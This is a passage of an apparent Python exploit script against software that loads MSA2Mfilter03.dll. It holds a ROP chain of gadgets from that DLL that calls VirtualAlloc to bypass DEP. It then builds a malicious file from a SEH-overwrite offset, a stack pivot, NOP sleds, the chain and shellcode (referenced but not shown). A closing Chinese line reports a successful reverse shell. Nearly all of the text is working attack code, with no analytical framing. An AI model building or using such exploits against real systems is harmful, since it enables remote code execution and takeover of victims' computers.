    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    0x10031d7e,  # INC ECX # AND EAX,8 # RETN [MSA2Mfilter03.dll] 
    #[---INFO:gadgets_to_set_ebx:---]
    0x1001505a,  # POP EBX # RETN [MSA2Mfilter03.dll] 
    0xffffffff,  #  
    0x100319d3,  # INC EBX # FPATAN # RETN [MSA2Mfilter03.dll] 
    0x100319d3,  # INC EBX # FPATAN # RETN [MSA2Mfilter03.dll] 
    #[---INFO:gadgets_to_set_edi:---]
    0x100290a8,  # POP EDI # RETN [MSA2Mfilter03.dll] 
    0x1002a602,  # RETN (ROP NOP) [MSA2Mfilter03.dll]
    #[---INFO:gadgets_to_set_esi:---]
    0x100217e1,  # POP ESI # RETN [MSA2Mfilter03.dll] 
    0x1002ab52,  # JMP [EAX] [MSA2Mfilter03.dll]
    0x1002ca2d,  # POP EAX # RETN [MSA2Mfilter03.dll] 
    0x1005d060,  # ptr to &VirtualAlloc() [IAT MSA2Mfilter03.dll]
    #[---INFO:pushad:---]
    0x10014720,  # PUSHAD # RETN [MSA2Mfilter03.dll] 
    #[---INFO:extras:---]
    0x100371f5,  # ptr to 'call esp' [MSA2Mfilter03.dll]
  ]
  return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()



junk1 = b"A"*43474  # seh offset
#seh = b'\xcc\xcc\xcc\xcc'
seh = struct.pack('<I',0x1001f35f)  # ADD ESP,19000 # RETN
nops1 = b'\x90'*(58760+32-1368)
nops2 = b'\x90'*32
junk2 = b"C"*1000
payload = junk1+seh+nops1+rop_chain+nops2+shellcode+junk2
with open(filename,"wb") as filehander:
	filehander.write(payload)

成功反弹shell

seh